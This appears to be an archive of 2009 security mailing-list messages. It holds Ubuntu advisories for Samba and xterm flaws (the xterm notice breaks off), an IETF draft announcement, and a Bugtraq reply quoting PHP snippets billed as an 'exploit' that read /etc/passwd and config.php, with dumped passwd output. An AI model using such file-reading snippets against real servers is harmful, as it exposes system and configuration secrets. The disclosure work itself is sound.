Vulnerability   
Search   
    Search 219043 CVE descriptions
and 99761 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-702-1           January 05, 2009
samba vulnerability
CVE-2009-0022
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  samba                           2:3.2.3-1ubuntu3.4

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Gunter Höckel discovered that Samba with registry shares enabled did not
properly validate share names. An authenticated user could gain access to the
root filesystem by using an older version of smbclient and specifying an
empty string as a share name. This is only an issue if registry shares are
enabled on the server by setting "registry shares = yes", "include = registry",
or "config backend = registry", which is not the default.


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4.diff.gz
      Size/MD5:   228722 0f792a410505a9918479562ef16ccef4
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4.dsc
      Size/MD5:     1902 0bda9c946d4f940383ca31bb7ad3e3e8
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3.orig.tar.gz
      Size/MD5: 23704996 c1630a57ac0ec24bc364c6d11c93ec35

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.2.3-1ubuntu3.4_all.deb
      Size/MD5:  6261402 cdfa982dd0b9c04511734aba9cb98f43
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.2.3-1ubuntu3.4_all.deb
      Size/MD5:  7954776 d12c0694fa65e5f7162d5322f6765822

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:   638726 cc8150b5214fb77d9dfc019b2526cb7c
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1968610 adbbd514e01210d81004f1b9e674701e
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1370212 3192295c2170f5342235edcfd5a2044a
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:    89088 fd98b8c2d156a43597d81cb3c05ab3de
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  3815552 f36fd7dc29e504467a9e0c08f675dc48
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1993446 547e40f9cbc9e94908b9c21b54cf7c1f
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  5802386 e3e7c712a2784007497213bb0cf2d3d1
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  4908532 9188ed5c2e93fcfcc93ffb57aa33a4eb
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  7173498 6098ce448371e6cb7ba8a7d1acc82f39
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1529412 99c94bc3bc8b4ca40b70844062cb0158
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1112728 6e7be6d81d4bb9645fe7049ad1098e24
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  3349950 4865e691932849cb5d554b27dc8203c6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:   574078 2547fa4ec3a2704e7600cfc1682e2678
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1844540 d766893ef3b88eefe3a5ff236d37a083
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1217736 fb4a6dcac85271bb5abd3102e246e908
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:    87620 145a90245f66ae82c94611c9a5ef90c6
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  3459480 f83b000101753604b107b969cbafaf38
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  2077500 e4d3bba7c3992d54a002a3de960da088
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  5161386 2f816bd0759b5395312b0260b2b1a830
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  4368978 e94a0a0065575763eb688719be55bb55
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  6402838 50306da79199442d648c653563d818e8
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1375964 bb03430c3f6d5f0b6a0ce5582fc4d355
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1006606 f296946e86f49c6fb12b6a6fc74e5006
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  2975328 c9581db640df6618b35bf0386817185e

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:   553748 4158873bb22c417e2817099582adef0c
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  1769190 f6dea760e2013d0902aea9bb366a7117
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  1160952 11776d3e92c48211b61d9aad4a83092a
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:    87062 ac2ead655b9e860e180778bdc3b601d8
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  3328740 fc6f54cab0701fc9c2f9f40712a322aa
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  2069796 5a757bef21769a0f99d571a9b16f0f41
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  4950004 4e7fd36bae326ccc396c16c023ad6789
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  4197392 34b7b42b2c5ab302afc86abca35cf459
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  6136884 b3f071c6be8fb4b0ae36b9a4f342328c
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  1317220 a2c2ba9a7251b9e66b7541012493a91d
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:   968410 72ced84400e6d8739710fcde6f4bafea
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  2855910 d92babc2dda651f130f15e16d887853c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:   606564 344aced9680f82f2144be4845d4f91a3
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1730412 8068336341c057b8d95be0601c204e3c
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1255134 86970b95de4ed88deb2d0497bc532fd6
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:    89038 cc4c8f2c4da9b4e8df3608c4a12547fb
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  3600282 9cd6002671370f4ae3d8a26ff72fb60f
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  2058546 1aecd0379eecc99b41fc6ce2a69309c7
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  5474936 044102518d3695912332b4eae9527b4b
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  4640066 96726a3b481e8e220d9e1ab27cd31a2f
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  6653622 f778f74e99accb34e8f385c5804b3d1e
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1417512 7a4323d2fe779cb63c7f1ad7387b1b83
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1046216 75bd47fd42c6ae14db5573e8b176137e
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  3123092 d2664b3080094bb24b530513c6359003

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:   592718 5debe4b94931b2c88f8fa475f5f77bc4
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  2008260 f498681d446a2ad9fc9f524fd077b4ae
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  1216100 c01b1c22f857ed00cef34c6c8be07fb9
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:    87638 08d33dc1f635ce0a7937c944a8009d49
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  3501506 eb3aedcad68acbaa6624173801aebe91
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  2007758 a3dfca08a50155f594c51ca801a258ad
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  5327954 1e480e57d3de6bfcce1a179d23a6d817
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  4502118 ba2c5b5240d8de234da5e5e006924da4
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  6448130 13a2ae5a41f1d7d026f109986927813b
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  1371138 05fc1469ba4f74621b93b47a3205b1cb
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  1019768 bf17ef67379f1b0c0ef76d74ffe3cd66
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  3029050 88018f0ef574839c0d956e62b5f873d6



--=-kQ5tEg1BNWkAxT8Ux/U8
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkliaqsACgkQLMAs/0C4zNqMFgCbBhsitSgMnwqDwxUHLJPj2coP
SagAn3EB44LfzgI2DvUssXMvbuGfzfci
=6N5y
-----END PGP SIGNATURE-----

--=-kQ5tEg1BNWkAxT8Ux/U8--

From - Tue Jan  6 11:40:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000565a
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39073-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C1B47ED2EB
for <lists@securityspace.com>; Tue,  6 Jan 2009 11:32:55 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 696EF14371D; Tue,  6 Jan 2009 09:28:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26950 invoked from network); 6 Jan 2009 01:28:00 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:x-mailer:date:to
         :from:subject:mime-version:content-type;
        bh=mt66IL8wzLOuvSf0ZpYq/E+U30XFddwn08IU+RHF45k=;
        b=mrYpy9F39XhOyVRUqIBmX5Pe/Ul5uXXOhw0OnGHiOPscaiWSkMOPIvSoqfxPdPcqJQ
         dTLAnEqyDKCIilvbLibRLCyybLr1FT3dxuVgPl8zX7aoC2kmAjOG8yFZaYNUANfUj/IN
         Y8m4p2M3EsN4Rn6oWOIqTMLlK0yzTAIZx3aAwDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:x-mailer:date:to:from:subject:mime-version:content-type;
        b=ZnfldZWRGlnJpKx0eP/Dw1l6BoVHQVzCp59H8nXBInBTH2sfzdOtXUkM4GCwTdJwNL
         rQfaF8Lg+6fXnJyWtF9Y21Lpy9d5Hr1ROy0F0ucBRNIijiLCAU1RGCMNfZWAOghe8upR
         7N39BThafebMqnDdzdWn5mIGS4L+hh9aP6OdcMessage-ID: <4962b8d5.4403be0a.5d9c.3ce4@mx.google.com>
X-Mailer: QUALCOMM Windows Eudora Version 7.1.0.9
Date: Mon, 05 Jan 2009 22:43:03 -0300
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
From: Fernando Gont <fernando.gont@gmail.com>
Subject: [Suspected Spam]"Security Assessment of the Internet Protocol" & the IETF
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Brightmail-Tracker: AAAAAw0SGycNEd85DRIp8Q=Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Folks,

In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of
National Infrastructure) published the document "Security Assessment of the
Internet Protocol". The motivation of the aforementioned document is
explained in the Preface of the document itself. (The paper is available
at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf )

Once the paper was published by CPNI, I produced an IETF Internet-Draft
version of the same paper, with the intent of having the IETF publish
recommendations and/or update the specifications where necessary. This IETF
Internet-Draft is available at:
http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's
also available at the IETF I-D repository).

The Internet-Draft I published was aimed at the OPSEC WG. And the Working
Group is right now deciding whether to accept this document as a WG item.
This is certainly a critical step. Having the OPSEC WG accept this document
as a WG item would guarantee to some extent that the IETF will do something
about all this, and would also somehow set a precedent in updating the
specifications of core protocols and/or providing advice on security
aspects of them.

The call for consensus is available at:
http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can
voice your opinion on the relevant mailing-list sending an e-mail to
opsec@ietf.org . You don't need to subscribe to the mailing list to post a
message (although your message will be held for moderator approval before
it is distributed to the list members).

The deadline for posting your opinion is January 9th (next Friday).

Thanks so much!

Kind regards,
Fernando Gont




-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003) - not licensed for commercial 
use: www.pgp.com

wsBVAwUBSWK2AZbuqe/Qdv/xAQi1/AgAn+H3N3LHqbOxrl1HRXX0D2WULRfz7Ni8
VnV3pltrsSmRKXWvflgsrIhwdR0s2nzoFI7mh42Eks2EErKY596kj0CMhUqjQmZT
+Oqgaw0jz7XuGadeN6nErze8AOTA5HzIsK+hl93C/qGoyucW42XKNdeJZlXgOp2Q
8RAKGeogoPNAMw0btVNUj6HZP0dLaqM+2VuQSx9Vr1OIU01+WZ9z/BMQwjKgAl91
sixOPNXZeMT07GCqS03UWGGv+USyw3ksgc2n+X6IOv/HmOOAwduqFyGu6BzzEIDE
H86b4DAiye5f5qARrx5JNdsGEK11uWY/H1lFTOu6oP+GXZwkyfv5gg==m6sI
-----END PGP SIGNATURE-----


--
Fernando Gont
e-mail: fernando@gont.com.ar || fgont@acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1




From - Tue Jan  6 11:50:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000565b
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39075-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C7837ED48B
for <lists@securityspace.com>; Tue,  6 Jan 2009 11:43:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 3F066143971; Tue,  6 Jan 2009 09:29:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3904 invoked from network); 6 Jan 2009 12:13:55 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type:Message-ID;
  b=N6VbtlhvbTZ+zYEb6I1qxifgEwX0evctk82hnUpxnYiyheShPdTDRtzBFOR/efsnYNAcOJ60plFtu9t4/3v/nYDN4Snp75BxYkODYa2ASWCF8MseMfny/efYT3ujkwm1hWi4NAh64xQjLgkrI6bOc8NRDUDPzTUAH9UnKtPDmq0=;
X-YMail-OSG: NimVTZAVM1lZAIlex0B8yPr4C0pYAcFQIbVARFqHJrsppo6bB0TRbg7MyxCECzi7jY9kVD4CLSfDSRZTO5bEszL0_6FmsnuBB3muwX4kU3ADr_OzlbNwlDN.xnC67iUR_.ZcMa_04.4iGd98wg_UxUmOQXBuXxWxDhw83zI9KvyXwbVERvklTmuUM6CgbPfWcUbYH6mYurzv5RGefuZ4utVxtiD0_5MxZrAnpRnZftOkeIfxCdQ1GXU-
X-Mailer: YahooMailWebService/0.7.260.1
Date: Tue, 6 Jan 2009 04:36:13 -0800 (PST)
From: Slack Traq <slacktraq@yahoo.com>
Reply-To: slacktraq@yahoo.com
Subject: Re: php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass&#8207;
To: bugtraq@securityfocus.com
In-Reply-To: <20090104193908.7771.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <499231.84297.qm@web52602.mail.re2.yahoo.com>
Status:   


There is no bug so no exploit can exist. File /etc/passwd is readable by any user (inside PHP with safe_mode disabled also) as it doesn't contain very sensitive information such as user passwords.

Double check what are you posting before actually doing it please.

Regards

--- On Sun, 1/4/09, l1un@hotmail.com <l1un@hotmail.com> wrote:

> From: l1un@hotmail.com <l1un@hotmail.com>
> Subject: php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass&#8207;
> To: bugtraq@securityfocus.com
> Date: Sunday, January 4, 2009, 11:39 AM
> Ahthoer:Super-Crystal
> www.arab4services.net
> safe_mode off (tested)
> <?
> show_source ('/etc/passwd');
> ?>
> Example exploit:
> <?
> show_source ('/home/user/public_html/config.php');
> ?>
> -----------------------------
> highlight_file()

>    <? 
> highlight_file ("/etc/passwd"); 
> ?> 
> exploit !!!  
> <code><span style="color: #000000">
> root:x:0:0:root:/root:/bin/bash<br
> />bin:x:1:1:bin:/bin:/sbin/nologin<br
> />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br
> />adm:x:3:4:adm:/var/adm:/sbin/nologin<br
> />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br
> />sync:x:5:0:sync:/sbin:/bin/sync<br
> />shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br
> />halt:x:7:0:halt:/sbin:/sbin/halt<br
> />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br
> />news:x:9:13:news:/etc/news:<br
> />uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br
> />operator:x:11:0:operator:/root:/sbin/nologin<br
> />games:x:12:100:games:/usr/games:/sbin/nologin<br
> />gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br
> />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br
> />nobody:x:99:99:Nobody:/:/sbin/nologin<br
> />dbus:x:81:81:System message bus:/:/sbin/nologin<br 
>  
> :)
>  
> greetz:php.net!

> th4nx securityfocus


      

From - Tue Jan  6 12:00:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000565c
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39072-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D1FBDED4B8
for <lists@securityspace.com>; Tue,  6 Jan 2009 11:53:51 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id CD51914370C; Tue,  6 Jan 2009 09:27:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26658 invoked from network); 6 Jan 2009 01:01:03 -0000
Date: Mon, 5 Jan 2009 17:23:08 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-703-1] xterm vulnerability
Message-ID: <20090106012308.GC7027@outflux.net>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="BXVAT5kNtrzKuDFl"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.63 on 10.2.0.1
Status:   


--BXVAT5kNtrzKuDFl
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-703-1           January 06, 2009
xterm vulnerability
CVE-2006-7236, CVE-2008-2383
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  xterm                           208-3.1ubuntu3.1

Ubuntu 7.10:
  xterm                           229-1ubuntu0.1

Ubuntu 8.04 LTS:
  xterm                           229-1ubuntu1.1

Ubuntu 8.10:
  xterm                           235-1ubuntu1.1

After a standard system upgrade you need to restart any running xterms to
effect the necessary changes.

Details follow:

Paul Szabo discovered that the DECRQSS escape sequences were not handled
correctly by xterm.  Additionally, window title operations were also not
safely handled.  If a user were tricked into viewing a specially crafted
series of characters while in xterm, a remote attacker could execute
arbitrary commands with user privileges. (CVE-2006-7236, CVE-2008-2382)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1.diff.gz
      Size/MD5:    62958 2178b13411ef6c0c84c455e7848c3b5a
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1.dsc
      Size/MD5:      800 6ff1855e882930be579eceb46223db59
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208.orig.tar.gz
      Size/MD5:   749755 a062d0b398918015d07c31ecdcc5111a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_amd64.deb
      Size/MD5:   416612 21f755ffe914eb143fb35f6be7d02ff7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_i386.deb
      Size/MD5:   396128 55b3a16962774230c48fb98ab90b6977

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_powerpc.deb
      Size/MD5:   408068 f7dab234c7df117de7e401cd966017a0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_sparc.deb
      Size/MD5:   403704 33cf8ee56acd8dd86540e72c26a5d54a

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1.diff.gz
      Size/MD5:    64026 93836a39864144c4f590202c85fb57c7
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1.dsc
      Size/MD5:      953 9b24ce999d1ca82a60f437f4c00ec847
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229.orig.tar.gz
      Size/MD5:   841542 f7b04a66dc401dc22f5ddb7f345be229

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_amd64.deb
      Size/MD5:   471288 599f1bfda25b6f178a37f94f775f155c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_i386.deb
      Size/MD5:   454306 6898963b2f11ecd8e950b68afe1d3c20

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu0.1_lpia.deb
      Size/MD5:   454086 5bddec1c5e539884545e735fee6543f1

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_powerpc.deb
      Size/MD5:   470124 9c002fb71ddfd4d603b3789d234a1ae3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_sparc.deb
      Size/MD5:   465888 2df2203939f22f1ea2cfe8aef5f17f3c

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1.diff.gz
      Size/MD5:    64381 4b78020812d35038e91ab80718d76be4
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1.dsc
      Size/MD5:      953 46cf3fcc74956b9fe99ba89faab5ec7c
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229.orig.tar.gz
